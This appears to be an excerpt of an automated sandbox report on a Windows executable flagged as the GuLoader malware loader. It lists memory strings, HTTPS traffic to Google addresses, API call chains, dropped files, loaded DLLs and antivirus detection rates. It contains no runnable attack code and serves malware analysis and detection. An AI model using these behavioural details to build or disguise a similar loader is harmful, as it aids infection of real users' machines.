00000008.00000003.2580408601.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2316016374.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E15000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2602388966.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2536786726.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2234774627.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2491797789.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2421966346.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2351154221.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2246044781.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2338323093.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2636543650.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2580408601.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2373546793.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2558464572.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2316016374.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.coml
      Source: Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.comll
      Source: Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: Osb7hkGfAb.exe, 00000008.00000003.2188217884.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2409999678.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.9:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.33:443 -> 192.168.2.9:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49755 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49757 version: TLS 1.2
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile created: C:\Windows\Arder.lnkJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_004069450_2_00406945
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_0040711C0_2_0040711C
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_6FF81A980_2_6FF81A98
      Source: Osb7hkGfAb.exeStatic PE information: invalid certificate
      Source: Osb7hkGfAb.exe, 00000000.00000002.2637815169.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs Osb7hkGfAb.exe
      Source: Osb7hkGfAb.exe, 00000008.00000000.2026044066.0000000000458000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs Osb7hkGfAb.exe
      Source: Osb7hkGfAb.exeBinary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs Osb7hkGfAb.exe
      Source: Osb7hkGfAb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal76.troj.evad.winEXE@3/8@2/2
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile created: C:\Users\user\tranchetJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile created: C:\Users\user\AppData\Local\Temp\nscD47A.tmpJump to behavior
      Source: Osb7hkGfAb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Osb7hkGfAb.exeVirustotal: Detection: 68%
      Source: Osb7hkGfAb.exeReversingLabs: Detection: 75%
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile read: C:\Users\user\Desktop\Osb7hkGfAb.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Arder.lnk.0.drLNK file: ..\Users\user\Disannex.And37
      Source: Osb7hkGfAb.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.2638880242.0000000002A86000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2637639337.00000000017C6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_6FF81A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6FF81A98
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeCode function: 0_2_6FF82F60 push eax; ret 0_2_6FF82F8E
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeFile created: C:\Users\user\AppData\Local\Temp\nswE071.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
